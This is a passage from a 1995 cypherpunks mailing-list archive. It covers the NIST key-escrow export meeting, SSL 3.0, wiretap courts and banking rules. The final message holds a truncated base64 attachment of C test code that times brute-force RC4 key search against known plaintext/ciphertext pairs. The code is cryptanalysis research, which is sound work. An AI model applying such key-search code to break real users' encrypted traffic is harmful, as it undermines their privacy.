>trust is needed, and the relationship is such that neither party takes
>any significant risk - a cash sale, perhaps.  For t=1, in some sense
>total trust is needed, and a party can cheat the other with 100% safety.
>
>Now let h(t) be the honesty reputation of a person, so that the utility
>which people expect to receive from them gets multiplied by h(t).  For a
>person with a repuation for honesty, h(t) is close to 1 for all t.  For a
>person who seems dishonest, h(t) will go from 1 to 0 as t goes from 0 to
>1.
>
>This is all pretty hand-wavy, but the idea would be to come up with good
>strategies to estimate h(t) from a person's behavior, and good ways to
>choose what kind of behavior one should follow given the value(s) of t
>which are prevalent in the market.  This kind of analysis would lead you
>to focus on the importance of the amount of trust needed in a transaction.
>The underlying utility function is based on such traditional factors as
>productivity and reliability.  It won't change as we consider the
>variables of our analysis, because we have factored out the honesty and
>trust issues so that they are more explicit.  That's the kind of
>direction I was suggesting.

The strategy for estimating h(t) should be wholly independent of the
utility model.  Otherwise you'd be effectively unable to make efficient
use of rating services, which do such evaluations as their business.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 5 Dec 95 16:36:45 PST
To: cypherpunks@toad.com
Subject: Re: NIST GAK export meeting, short version
In-Reply-To: <64158.pfarrell@netcom.com>
Message-ID: <30C4E4B1.40E9@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Pat Farrell wrote:
> He said that they have studied the encryption that is supposed to be widely
> available on the Internet. He said that viewed by crypto experts, not
> much is very good. He mentioned "two incidents" where Netscape had
> weak implimentations. He feels that companies will not trust software
> over the 'net. that they "want the US Government to say that 'this is
> good enough'."

  Was he able to name any companies that would not buy products without
the "US Government seal of approval"?  It seems kind of odd that he is
slamming Netscape for having had a weak implementation when he would love
to force everyone to have a "weak implementation".  I'm sure that he will
be happy to know that we have fixed these weaknesses.  :-)

> Clint Brooks, of NSA, then went over the revised criteria. He claimed that
> they were surprized at the industry concern over "one product" for
> worldwide markets. There were lots of questions. He eventually admitted
> that because of the "one product" concern, export regulations will effect
> domestic products. [all the more reason for Netscape to keep building ten
> or whatever it is.]

  Agreed.

> There was a representative from Netscape. He said that they, as a company
> think this is a terrible idea. They oppose it now, and will be issuing
> a company policy soon. I didn't catch his name, and couldn't find him
> to get the obviously carefully prepared text. If someone from Netscape, are
> you listening Jeff W? could get me the text, I'll add it to my writeup.

  I assume you are talking about the exact text of the statement that
our representative made at the meeting.  I will try to get it, but it
may take a day or two since they will be in DC until at least tomorrow.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 5 Dec 95 13:58:43 PST
To: cypherpunks@toad.com
Subject: Clarinet News Articles #1 [POINTER]
Message-ID: <199512052159.QAA12946@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The following news articles may be of interest to list subscribers:  
  
clari.news.censorship: Landmark First Amendment case  
4 Dec 95, 12:00  
  
clari.news.censorship: Donna Rice Fights Cybersmut  
1 Dec 95, 21:01  
  
clari.news.sex: Sponsor of cyberporn legislation  
4 Dec 95, 14:20  
  
clari.news.sex: Internet Smut Pact Reached  
2 Dec 95, 07:10  
  
--tallpaul@pipeline.com  
       
      




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Tue, 5 Dec 95 17:46:20 PST
To: ssl-talk@netscape.com
Subject: New version of SSL 3.0
Message-ID: <30C4F630.794B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


[This is the second try at sending this message.]

SSL 3.0 protocol has been substantially changed from earlier drafts to
fix a number of performance and cyrptographic issues. The latest version
can be found as PostScript in a compressed tar file on

        ftp://ftp<N>.netscape.com/pub/review/ssl-spec.tar.Z

where <N> is a digit in the range [2-8]. An HTML version should be
available in a day or two. I will post the URL when that happens.

Netscape is also in the process of submitting this draft to IETF.

Questions and comments about this specification should all be directed
to ssl-talk@netscape.com. Answers and replies will be posted there. We
are quite interested in your feedback.

As new eyes see the spec for the first time, I suspect that we will be
notified about typos and areas that are not as clear as they should be.
As a result, there will probably be an update in 2 weeks or so.

PK
--
Philip L. Karlton               karlton@netscape.com
Principal Curmudgeon            http://www.netscape.com/people/karlton
Netscape Communications




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Tue, 5 Dec 95 14:48:32 PST
To: cypherpunks@toad.com
Subject: NIST GAK export meeting, short version
Message-ID: <64158.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I just got back from the NIST GAK export meeting. This is
a short writeup of a summary. I'll post a longer version later
this evening or early tomorrow morning.

The meeting was hosted by Ed Roback of NIST, who quickly introduced
Mike Nelson of the White House. Mike is clearly a political guy.
His handout says: "We believe that our proposal for exportable 64-bit key
escrow encryption meets these goals [the goals of VP Gore's letter to Rep
Cantwell, July 20, 1994]." He said that the criteria describe a solution,
but not the only solution.  He said it does not preclude other
implementations in the future. He anticipates that the State Department
will issue guidance based upon these criteria in "early 1996," and that
between now and then, any product that meets the criteria will be elegible
for expidited approval. Of course, the existing (slow as molasass) process
will continue.

I asked the first questions from the floor. The two questions were:
(1) Is this meeting concerned solely with export
of software, or does it deal with controling domestic use of strong
cryptography? and (2) since the 64-bit limit was severly criticized at
the Sept meeting, why is it still needed if there is also escrow?

His answer was that there is "no intention to control domestic encryption"
and on the 64-bit issue, that the government is "not certain it will
work." he says they "want to see it implemented and want to see
how it works" because 64-bit encryption is very strong. If the escrow
doesn't work, they don't want a lot of softare to be in widespread use.

He said that they have studied the encryption that is supposed to be widely
available on the Internet. He said that viewed by crypto experts, not
much is very good. He mentioned "two incidents" where Netscape had
weak implimentations. He feels that companies will not trust software
over the 'net. that they "want the US Government to say that 'this is
good enough'."

Clint Brooks, of NSA, then went over the revised criteria. He claimed that
they were surprized at the industry concern over "one product" for
worldwide markets. There were lots of questions. He eventually admitted
that because of the "one product" concern, export regulations will effect
domestic products. [all the more reason for Netscape to keep building ten
or whatever it is.]

Brooks admitted that it is impossible to prevent multiple encryption.
Cypherpunks would do that by using PGP and then sending it using GAK.
He said "as a person, you can set up a secure communication method, and
nothing can be done about it." His concern is not that smart people can
have stronger crypto, but that strong crypto will be easy and widely used.

He said that the 64-bit key limit is not meant to restrict RSA keys to
64-bits, but rather to restrict the session keys that are encrypted using
RSA. Unspoken was the assumption that the 2000 bit RSA secret key would
have to be escrowed.

There were some interesting (and bad IMHO) implications of interoperability.
I'll cover them more in the long version. Basically, they admitted that
the interoperability restrictions made it stupid to have an export
version, you should have a strong domestic version, and an international
version developed offshore for sale to the rest of the world.

They admitted that there can be no controls over export of data, so once
interoperating software is available both domestically and from offshore
sources, there is no value in the export controlled, crippled version.

My favorite policeman, Geoff Greiveldinger, then described the
characteristics of an acceptable key escrow agent. There was a long list
of criteria, all unseen before the meeting. The general reaction
of the audience was that these were "yet another set of criteria that
must be met." Geoff claimed that they were simply trying to address
the questions raised at the earlier meeting about who is an
acceptable escrow agent. One point that caused a lot of concern
was that at least one employee of the escrow agent has to have a SECRET
clearence.

Industry, with a few exceptions, soundly said that this is a dumb idea,
that there is no market, that the criteria are too hard, etc. Except
Padgett Petersen, representing Lockheed-Martin. He said that LM thought
that the criteria were just peachy. The  usual civil liberties folks
also soundly trashed it.

There was a representative from Netscape. He said that they, as a company
think this is a terrible idea. They oppose it now, and will be issuing
a company policy soon. I didn't catch his name, and couldn't find him
to get the obviously carefully prepared text. If someone from Netscape, are
you listening Jeff W? could get me the text, I'll add it to my writeup.

 ******************

What I think it means:

I believe that the government deeply wants to restrict domestic use of
strong encryption, but they have no legal justification for doing so.
They can't expect that they will get it if they go to Congress. So they
are attempting an end-arround using the export criteria, which they
_do control_. They hope that the pain of having multiple versions will be
so high that no vendor will bother, and all we'll have is crippled
software.

The usual civil liberties lobby folks (CDT, EPIC, etc.) want to
hold their own, industry sponsored meetings to develop workable systems.

I think that the real key is for everyone, worldwide to insist on
both strong crypto and interoperability. The Germans are already
writing fine software and making fast hardware. Microsoft and Netscape
can easily afford to do some of their development offshore. If the products
sell and are deployed, it won't matter what the govies want.

Pat

ps. there were a number of other cypherpunks in attendance. I hope
some will add their impressions of the day.

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Mon, 4 Dec 95 23:23:48 PST
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: GAK_hit
Message-ID: <199512050723.SAA03602@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain



>  I've heard that when a machine that already has Internet In A
>Box, Netscape Navigator personal edition, or some other internet
>software with a stack and dialer is upgraded to Win95, the win95
>installation may somehow disrupt the functioning of the winsock
>or dialer.  I've also heard that re-installing the application
>will solve the problem.  I've never seen the problem myself,
>and don't know anything about any subpoena...
>
>	--Jeff
>
>-- 
>Jeff Weinstein - Electronic Munitions Specialist

My understanding is that Win '95 installs its winsock.dll in
/windows/system, which is where a number of other Internet packages also
install their winsock.dll. As their .dll is replaced by MS's, they cease to
function (either correctly or at all). The problem is resolved by
re-installing the original winsock.dll or configuring the Internet software
to look elsewhere for it.

Regards,

Mark Neely
___
Mark Neely - accessnt@ozemail.com.au
Lawyer, Professional Cynic
Author: Australian Beginner's Guide to the Internet
Work-in-Progress: Australian Business Guide to the Internet
WWW: http://www.ozemail.com.au/~accessnt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Dec 95 17:05:31 PST
To: cypherpunks@toad.com
Subject: re: NIST GAK export meeting, sv
Message-ID: <acea28dc0a0210045b72@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Hieronymous@bosch.art wrote:

>      (Thanks for the summary, Pat.)

I concure. Nice summary. I hope Pat doesn't run out of steam before getting
the full version out (writing summaries can sometimes do that).


>      This last bit is really rich. I can't think of a single publically
>defensible reason for the stipulation that every escrow agent must employ
>someone with SECRET clearance, but I *can* think of a publically
>indefensible reason for it -- to facilitate those spooky non-court wiretap
>authorizations that've been alluded to in the fine print of the GAK
>proposals.

One "defensible" (and maybe even good) reason is because someone with
government clearance can then be prosecuted for leaking what they know,
whereas ordinary citizens are harder to prosecute for this. I doubt this is
the main reason, but it makes a certain kind of sense.

But there are other more interesting links between Secret clearances and
wiretaps.

The "Foreign Intelligence Surveillance Court" meets in Arlington, VA as the
need arises to authorize wiretaps in private, for intelligence collection
reasons. I think this has been discussed a couple of times on the list, so
a search of the archives might be useful to those who are curious. (Also, a
couple of the recent book on the Intelligence Support Activity, Ruby Fruit,
etc., have details on how this court operates.)

Though little of how GAK has been released (or reported here, or in the
press), there is no doubt in my mind that this Foreign Intelligence court
would of course continue to get its own wiretap authorizations.

(And not only "foreigners" are involved: anyone who is believed to have
importance to an intelligence matter is fair game for this court to
consider. Which is not surprising, really, as the goal is partly to catch
spies and plug security leaks--before someone goes ballistic and accuses me
of Betraying the Cause, I'm just describing things as they are. And surely
some security measures are warranted, even to Cypherpunks!)

>      Of course, just because escrow agents would be required to hire
>*someone* with a SECRET clearance doesn't mean that *anyone* with a SECRET
>clearance would fill the bill. And that's the rub: the administration of
>clearing people-with-SECRET-clearances for escrow agent employment would
>be conducted -- where else? -- *in secret*. SECRET clearance, of course,
>wouldn't be the salient criterion; after all, there are people on the
>Cypherpunks list -- and a few who aren't on it but are like-minded --
>who'd be, uh, reluctant to deliver keys in the absence of a a wiretap
>authorized by a judge.
>      And, as a petty aside, it's nice to see that the gov't had cooked up
>yet another way to force potentially legitimate businesses to pay its
>stoolpigeons to chip away out our civil rights.

Many think tanks and defense contractors have "sheep-dipped" retired
intelligence officials working for them and continuing to report (in
various ways) to their former paymasters.

Sometimes these sheep-dipped agents are just there to keep tabs on what's
going on, sometimes they're there to nudge these companies in certain
directions, and sometimes they are actually running "deniable" applications
from the private sector. (Recall Hughes, Air America, Castle Bank, etc.)

I can imagine that if some companies talked about in connection with
certain questionable activities (Banker's Trust, Bank of America,
Wackenhut, SAIC, etc.) were to bid for the contract to be a GAK Agent, then
there would be contacts back to the intelligence agencies.

But most GAK accesses would be handled through normal channels, albeit secret.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 5 Dec 95 15:52:24 PST
To: pfarrell@netcom.com
Subject: Re:  NIST GAK export meeting, short version
Message-ID: <9512052349.AA28680@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>_do control_. They hope that the pain of having multiple versions will be
>so high that no vendor will bother, and all we'll have is crippled
>software.

>I think that the real key is for everyone, worldwide to insist on
>both strong crypto and interoperability.

Anything that uses cryptography absolutely and positively *must* support
multiple cryptographic protocols.  Tag every RPC, transaction, method
invocation, what-have-you with some indicator that indicates not only
"encrypted" but "encrypted via method 2".  Allow customers to specify
policy, at least via an environment variable such as
	NETSCAPE_SSL_PROTECTION=1,2,4
where the online documentation says
	1 = 512bit RSA
	2 = 256bit RSA
	4 = Rot 13

Design open, extensible architectures with public registries and protocol
descriptions.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Tue, 5 Dec 95 16:03:09 PST
To: cypherpunks@toad.com
Subject: [Political Noise?] Banking law changes proposed
Message-ID: <01HYGJ5YZQHC9S3QEI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	In regard to the following, I wonder if anyone knows if they're also
proposing changes that will make banking secrecy more difficult? I know about
the other proposals (Carribean treaty and all that), but this report isn't
complete enough to tell if Greenspan and the other regulators are also
suggesting things.
	-Allen 

--------------------------------------------------------------------------------
      (c) 1995 Copyright Nando.net
      (c) 1995 Associated Press
      
   
   
   WASHINGTON (Dec 5, 1995 - 16:57 EST) -- Foreign banks can expect
   greater scrutiny of their trading, auditing and other internal
   controls in the wake of the Daiwa and Barings Bank disasters, Federal
   Reserve Board Chairman Alan Greenspan and other regulators said
   Tuesday.
   
   Greenspan and others told a House Banking subcommittee that with the
   lightning quick movement of money around global computer networks, a
   breakdown in internal systems could cause losses that spill over into
   the broader financial system.
   
[...]

   Greenspan and a top House Republican, Rep. Marge Roukema, R-N.J.,
   supported stricter audit standards for banks.
   
   "We are considering a number of initiatives that may be implemented at
   an administrative level, especially with respect to internal and
   external controls," Greenspan told a House Banking subcommittee on
   financial institutions.
   
[...]
   
   Roukema and the panel's leading Democrat, Rep. Bruce Vento, D-Minn.,
   said they want the General Accounting Office to study the adequacy of
   a 1991 law aimed at improving U.S. supervision of foreign banks.
   
   Vento cited a string of international banking scandals in recent
   years, ranging from collapse of Barings Bank to the problems
   surrounding Bank of Credit and Commerce International, and said that
   the global supervision system suffers from "a serious problem."
   
[...]
   
   Greenspan said international bank regulators are recognizing they must
   work together more closely to protect the integrity of the global
   banking system. Japan's Ministry of Finance drew heavy criticism in
   the Daiwa case for waiting six weeks before informing U.S. regulators
   about Daiwa's losses last summer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 5 Dec 95 20:10:33 PST
To: perry@piermont.com
Subject: Re: hack microsoft?
In-Reply-To: <199512060316.WAA10681@jekyll.piermont.com>
Message-ID: <199512060406.UAA23330@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Yes, I sent email, but haven't received anything back from
these people.

> 
> 
> So, are the folks that broke the Microsoft password stupidity getting
> "Hack Microsoft" T shirts?
> 
> .pm
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyal Collins <lyalc@ozemail.com.au>
Date: Tue, 5 Dec 95 02:52:00 PST
To: Andy Brown <a.brown@nexor.co.uk>
Subject: Re: bulk RC4 brute forcing
In-Reply-To: <199512030356.OAA17497@oznet02.ozemail.com.au>
Message-ID: <30C51EF5.5FBB@ozemail.com.au>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3936.1071713528.multipart/mixed"

--Boundary..3936.1071713528.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

following requests for this test code, the attached should compile and 
run the tests I desciribed earlier.
It is messy - sorry.
lyal
-- All mistakes in this message belong to me - you should not use 
them!


--Boundary..3936.1071713528.multipart/mixed
Content-Type: application/octet-stream; name="bin00000.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00000.bin"
Content-Description: "RC4M.C"

LyogcmM0IHRlc3QgYmVkDQogYmFzZWQgb24gUkM0IGNvZGUgZGV2ZWxvcGVk
IGJ5IEUgQSBZb3VuZywgYXBwYXJlbnRseSBmcm9tIGNvZGUNCiBjaXJjdWxh
dGVkIG9uIHRoZSBJbnRlcm5ldCBpbiAxOTk0LzUuIFBhcnQgb2YgRUFZJ3Mg
U1NMRUFZIGNvZGUgaXMgdXNlZCBoZXJlLg0KDQogSWRlYSBoZXJlIGlzIHRv
IGNvbXBhcmUgc2luZ2xla2V5L3BsYWluL2NpcGhlciB0ZXN0IHRpbWUgYWdh
aW5zdA0KIHNpbmdsZSBrZXksIG11bHRpcGxlIHBsYWluL2NpcGhlciBwYWly
cw0KIElzIHRoaXMgYXBwcm9hY2ggbW9yZSBlZmZpY2llbnQgPz8/Pw0KDQog
Ki8NCg0KI2RlZmluZSBQUk9UTw0KDQojaW5jbHVkZSA8c3RkaW8uaD4NCiNp
bmNsdWRlIDxzdGRsaWIuaD4NCiNpbmNsdWRlIDxzdHJpbmcuaD4NCiNpbmNs
dWRlICJ0aW1lLmgiDQojaW5jbHVkZSAicmM0LmgiDQoNCnN0YXRpYyBjaGFy
ICp2ZXJzaW9uPSJcMFJDNCBwYXJ0IG9mIFNTTGVheSB2IDAuNC4zIDE1LzA2
Lzk1IjsNCg0KdHlwZWRlZiAgdW5zaWduZWQgY2hhciBVQ0hBUjsNCg0KdHlw
ZWRlZiBzdHJ1Y3QgcmM0X3Rlc3RfcGFpcjENCgl7DQogICAgY2hhciBwbGFp
bls4XTsNCiAgICBjaGFyIGNpcGhlcls4XTsNCiAgICBpbnQgZm91bmQ7DQog
ICAgY2hhciBrZXlfZm91bmRbOF07ICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAvLw0KCX0gcmM0X3Rlc3RfcGFpcjsNCg0KdW5zaWduZWQgaW50
IGtleV9idWZmWzI1Nl07ICAgICAgICAgICAgICAgICAvL3VzZWQgdG8gc3Bl
ZWQga2V5IHNjaGVkdWxpbmcNCg0KUkM0X0tFWSBrZXk7ICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAvL21hc3RlciBrZXkgaXMgbWFkZSBoZXJl
DQoNClJDNF9LRVkga2V5dGVzdDsNCg0KI2RlZmluZSBOT19PRl9URVNUUyAg
MTI2DQpyYzRfdGVzdF9wYWlyIG1hc3Rlcl9wbGFpbl9jaXBoZXJbTk9fT0Zf
VEVTVFNdOyAgICAgLy9tYXN0ZXIgcGxhaW4vY2lwaGVyIHRlc3QgcGFpcnMN
CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
Ly9hY3F1aXNpdGlvbiAwZiB0aGVzZSBpcw0KICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAvL2Fub3RoZXIgcXVlc3Rpb24N
ClJDNF9LRVkgbWFzdGVyX2tleXNbTk9fT0ZfVEVTVFNdOyAgICAgICAgICAg
ICAgICAgICAvL21hc3RlciBrZXkgYXJyYXkNCg0KdW5zaWduZWQgY2hhciBi
dWZmZXJbXSA9ICAiMTIzNDU2NzgiOw0KdW5zaWduZWQgY2hhciBrZXk0W10g
PSB7MHgwLCAweDAsIDB4MCwgMHgwMSwgMHgwMiwgMHgwLCAweDAsIDB4MH07
DQp1bnNpZ25lZCBjaGFyIGtleTVbXSA9IHsweDAsIDB4MCwgMHgwLCAweDAx
LCAweDAyLCAweDAsIDB4MCwgMHgwfTsNCg0KdW5zaWduZWQgaW50IGtleV9z
dGFydCA9IDB4MDsgICAgICAgICAvL3N0YXJ0LCBlbmRwb2ludCBmb3Iga2V5
IHRlc3Qgcm91dGluZQ0KdW5zaWduZWQgaW50IGtleV9lbmQgICA9IDB4ZmY7
DQoNCnVuc2lnbmVkIGNoYXIgYSxiLGMsZCxlOw0KDQpjbG9ja190IHN0YXJ0
LCBlbmQ7ICAgICAgICAgICAgICAgICAgICAgLy90aW1lciB2YWx1ZXMNCmNs
b2NrX3QgY2xvY2soKTsNCg0KdW5zaWduZWQgbG9uZyBibG9ja3MgPSA0MDk2
OyAgICAgICAgICAgIC8vZGVmYXVsdCBibG9jayBjb3VudA0KbG9uZyBrOw0K
dW5zaWduZWQgbG9uZyBsb29wczsNCg0KDQoNCmZsb2F0IHR6Ow0KaW50IHo7
DQppbnQga2V5X2RhdGFfbGVuID0gODsNCmludCBidWZmZXJfbGVuID0gODsN
Cg0KDQovL2RlY2xhcmF0aW9ucw0Kdm9pZCByYzQodW5zaWduZWQgY2hhciAq
YnVmZmVyX3B0ciwgaW50IGJ1ZmZlcl9sZW4sIFJDNF9LRVkgKmtleSk7DQpz
dGF0aWMgdm9pZCBzd2FwX2J5dGUoIHVuc2lnbmVkIGNoYXIgKmEsIHVuc2ln
bmVkIGNoYXIgKmIpOw0Kdm9pZCByYzRfa2V5X3Rlc3Qodm9pZCk7DQoNCi8v
PT09PT09PT09PT09PT09DQoNCnZvaWQgbWFpbihpbnQgYXJnYywgY2hhciAq
YXJndltdKQ0Kew0KaWYgKGFyZ2MgIT0gMikgCQkgIC8qIGdldCBudW1iZXIg
b2YgYmxvY2tzICovDQogcHJpbnRmKCJcbk5vIGJsb2NrIHNpemUgc3BlY2lm
aWVkLCB1c2luZyAlZCBhcyBudW1iZXIgb2YgYmxvY2tzLlxuIiwgYmxvY2tz
KTsNCmVsc2UNCiBzc2NhbmYoYXJndlsxXSwiJUkiLCZibG9ja3MpOwkgICAg
Ly9nZXQgY291bnQNCg0KIGZvciAoej0wOyB6PDI1NjsgeisrKQ0KCWtleV9i
dWZmW3pdPXo7ICAgICAgICAgICAgICAgICAgLy9pbml0IGtleV9idWZmDQoN
CiAgICAvL21lYXN1cmUgcmF3IHNwZWVkDQoNCiBmb3IgKGE9MDsgYTxOT19P
Rl9URVNUUzsgYSsrKSAgICAgIC8vbWFrZSB0ZXN0IGRhdGENCiAgew0KICBr
ZXk1WzRdID0gYTsNCiAgUkM0X3NldF9rZXkoJmtleSwga2V5X2RhdGFfbGVu
LCAma2V5NSk7DQogIG1lbWNweSgmbWFzdGVyX3BsYWluX2NpcGhlclthXS5w
bGFpbiwgJmJ1ZmZlciwgYnVmZmVyX2xlbik7IC8vY29weSBwbGFpbiB0ZXh0
DQogIFJDNCgma2V5LCBidWZmZXJfbGVuLCBtYXN0ZXJfcGxhaW5fY2lwaGVy
W2FdLnBsYWluLCBtYXN0ZXJfcGxhaW5fY2lwaGVyW2FdLmNpcGhlcik7DQog
IH0NCg0KcmM0X2tleV90ZXN0KCk7ICAgICAgICAgLy9tZWFzdXJlIGtleSB0
ZXN0aW5nIHNwZWVkDQp9OyAgICAgICAgICAgICAgICAgICAgICAvL2VuZCBt
YWluDQovLyAgPT09PT09PT09PT09PQ0KDQovKiAgaWRlYSBpcyBiYXNlZCBv
biBtYWtpbmcgYSBtYXN0ZXIgcmM0X2tleSwgY29weWluZyB0aGF0IHRvIE5P
X09GX1RFU1RTIGtleSBzcGFjZXMNCiAgICBUaGVuLCBlYWNoIGNvcHkgb2Yg
dGhlIGtleSBpcyB0ZXN0ZWQgYWdhaW5zdCBhIHBsYWluL2NpcGhlcnRlY3Qg
cGFpci4NCiAgICBJZiBhIG1hdGNoIGZvdW5kLCBhIGZsYWcgaXMgc2V0IGZv
ciB0aGF0IHBsYWluL2NpcGhlcnRlY3QgcGFpciwgYW5kIHRoZQ0KICAgIGtl
eSBzdG9yZWQgd2l0aCBpdC4NCiAgICB0aGlzIHNob3VsZCByZWR1Y2Ugb3Zl
cmhlYWRzIGFzc29jaWF0ZWQgd2l0aCBrZXkgc2NoZWR1bGluZyAtIEkgaG9w
ZS4NCiovDQoNCnZvaWQgcmM0X2tleV90ZXN0KHZvaWQpDQp7DQppbnQgaTsN
CmludCBqPU5PX09GX1RFU1RTOw0KcHJpbnRmKCJcbk1lYXN1cmluZyB0aGUg
c3BlZWQgd2l0aCB3aGljaCB0aGlzIENQVSBjYW4gdGVzdCBmb3IgdmFsaWQg
a2V5cy4iKTsNCmxvb3BzPTA7DQplbmQgPSBjbG9jaygpOw0Kc3RhcnQgPSBj
bG9jaygpOw0Kd2hpbGUgKGVuZCA9PSBzdGFydCkNCiBzdGFydCA9IGNsb2Nr
KCk7ICAgICAgIC8vZmluZCBwb2ludCBpbW1lZGlhdGVseSBhZnRlciBjbG9j
ayB0aWNrIGhhcyBoYXBwZW5lZA0KDQpmb3IoIGEgPSBrZXlfc3RhcnQ7IGE8
a2V5X2VuZDsgYSsrKQ0Kew0KIGtleTRbN10gPWE7DQogZm9yKGI9a2V5X3N0
YXJ0OyBiPGtleV9lbmQ7IGIrKykNCiB7DQogIGtleTRbNl09YjsNCiAgZm9y
KGM9a2V5X3N0YXJ0OyBjPGtleV9lbmQ7IGMrKykNCiAgew0KICAga2V5NFs1
XT1jOw0KDQogICBmb3IoZD1rZXlfc3RhcnQ7IGQ8a2V5X2VuZDsgZCsrKQ0K
ICAgew0KICAgIGtleTRbNF09ZDsNCi8vICAgIHByaW50ZigiXG4gbnVtYmVy
IG9mIGtleXMgZm91bmQgZm9yIHBsYWluL2NpcGhlciBwYWlyID0gJWQiLCBq
KTsNCi8vICAgaWYoZCkNCi8vICAgIHsNCi8vICAgICBlbmQgPSBjbG9jaygp
LXN0YXJ0Ow0KLy8JIHR6ID0gIChlbmQvQ0xLX1RDSyk7DQovLwkgcHJpbnRm
KCJcblRpbWUgdGFrZW4gPSAlNi4xZiBzZWNvbmRzLCBudW1iZXIgb2Yga2V5
cyB0ZXN0ZWQgPSAlbGQuXG4iLCB0eiwgbG9vcHMpOw0KLy8JIHByaW50Zigi
JTYuMWYgIiwgKGZsb2F0KShsb29wcy90eikpOw0KLy8gICAgfQ0KLy9wcmlu
dGYoIlxuIG51bWJlciBvZiBrZXlzIGZvdW5kIGZvciBwbGFpbi9jaXBoZXIg
cGFpciA9ICVkIiwgTk9fT0ZfVEVTVFMtaik7DQogICAgZm9yKGU9a2V5X3N0
YXJ0OyBlPGtleV9lbmQ7IGUrKykNCiAgICB7DQogICAga2V5NFszXT1lOw0K
ICAgIFJDNF9zZXRfa2V5X3Rlc3QoJmtleSwga2V5X2RhdGFfbGVuLCAma2V5
NCk7ICAgIC8vbWFrZSBtYXN0ZXIga2V5DQogICAgZm9yIChpPTA7IGk8Tk9f
T0ZfVEVTVFM7IGkrKykgICAgICAgICAgICAgICAgICAgICAgICAgLy9tb3Zl
IG1hc3RlciBrZXkgdG8gYXJyYXkNCiAgICAgIG1lbWNweShtYXN0ZXJfa2V5
c1tpXS5kYXRhLCAma2V5LCBzaXplb2Yoa2V5KSk7DQoNCiAgICAgIGZvciAo
aT0wOyBpPE5PX09GX1RFU1RTOyBpKyspDQogICAgICAgew0KICAgICAgICBp
ZiAoIW1hc3Rlcl9wbGFpbl9jaXBoZXJbaV0uZm91bmQpDQogICAgICAgIHsN
CiAgICAgICAgbG9vcHMrKzsgICAgICAgICAgICAgICAgICAgICAgICAgICAg
IC8vaW5jcmVtZW50IHRoaXMgYXMgYSBjb3VudGVyDQogICAgICAgICBpZihS
QzRfdGVzdChtYXN0ZXJfa2V5c1tpXS5kYXRhLCBidWZmZXJfbGVuLCBtYXN0
ZXJfcGxhaW5fY2lwaGVyW2ldLnBsYWluLCBtYXN0ZXJfcGxhaW5fY2lwaGVy
W2ldLmNpcGhlcikpDQogICAgICAgICAgeyAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLy90aWxsIGtleSBtYXRj
aGVzDQogICAgICAgICAgbWFzdGVyX3BsYWluX2NpcGhlcltpXS5mb3VuZCA9
IDE7DQogICAgICAgICAgbWVtY3B5KG1hc3Rlcl9wbGFpbl9jaXBoZXJbaV0u
a2V5X2ZvdW5kLCBrZXk0LCA4KTsNCiAgICAgICAgICBqLS07DQovLyAgICAg
ICAgICBwcmludGYoIlxuIG51bWJlciBvZiBrZXlzIGZvdW5kIGZvciBwbGFp
bi9jaXBoZXIgcGFpciA9ICVkIiwgTk9fT0ZfVEVTVFMtaik7DQogICAgICAg
ICAgaWYgKCFqKQ0KICAgICAgICAgICB7DQogICAgICAgICAgIGVuZCA9IGNs
b2NrKCktc3RhcnQ7DQoJICAgICAgIHR6ID0gIChlbmQvQ0xLX1RDSyk7DQoJ
